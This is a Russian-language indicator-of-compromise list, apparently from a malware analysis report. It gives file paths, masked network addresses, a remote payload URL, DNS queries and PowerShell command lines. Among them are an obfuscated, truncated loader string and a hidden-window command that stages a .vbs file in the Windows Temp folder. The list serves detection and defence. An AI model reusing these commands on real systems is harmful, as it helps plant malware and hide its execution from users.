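Техническая информация

Примечание: подзаголовки разделов в этом списке, по-видимому, не сохранились. Ниже подряд идут пути к файлам, сетевые адреса и URL, DNS-запросы и командные строки процессов. Символы «#» в доменных именах и IP-адресах, судя по всему, являются маскировкой, поэтому эти значения не годятся для точного сопоставления и подходят лишь как шаблон. powershell.exe и regasm.exe — штатные компоненты Windows и .NET Framework, и само их наличие на диске не является признаком заражения. Значим контекст: запуск PowerShell со скрытым окном, копирование *.vbs в %WINDIR%\Temp и ярлык studio.lnk в папке автозагрузки.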
- %APPDATA%\microsoft\windows\start menu\programs\startup\studio.lnk
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %WINDIR%\temp\igcc.vbs
- 'im###upload.io':443
- 'pk#.goog':80
- '10#.#75.113.204':80
- http://pk#.goog/gsr1/gsr1.crt
- http://10#.#75.113.204/1252/HBC.txt
- 'im###upload.io':443
- DNS ASK im###upload.io
- DNS ASK pk#.goog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JtuHGUPNKMnnWUBtPBptuHGUPNKMnnWUBtPG0tuHGUPNKMnnWUBtPYQBntuHGUPNKMnnWUBtPGUtuHGUPNKMnnWUBtPVQBytuHGUPNKMnnWUBtPGwtuHGUPNKMnnWUBtPItuHGUPNKMnnWUBtPtuHGUPNKMnnWUBtP9tuHGUPNKM...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden if (-not (Get-ChildItem %WINDIR%\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\IGCC.vbs -Force }' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JtuHGUPNKMnnWUBtPBptuHGUPNKMnnWUBtPG0tuHGUPNKMnnWUBtPYQBntuHGUPNKMnnWUBtPGUtuHGUPNKMnnWUBtPVQBytuHGUPNKMnnWUBtPGwtuHGUPNKMnnWUBtPItuHGUPNKMnnWUBtPtuHGUPNKMnnWUBtP9tuHGUPNKM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden if (-not (Get-ChildItem %WINDIR%\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\IGCC.vbs -Force }
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'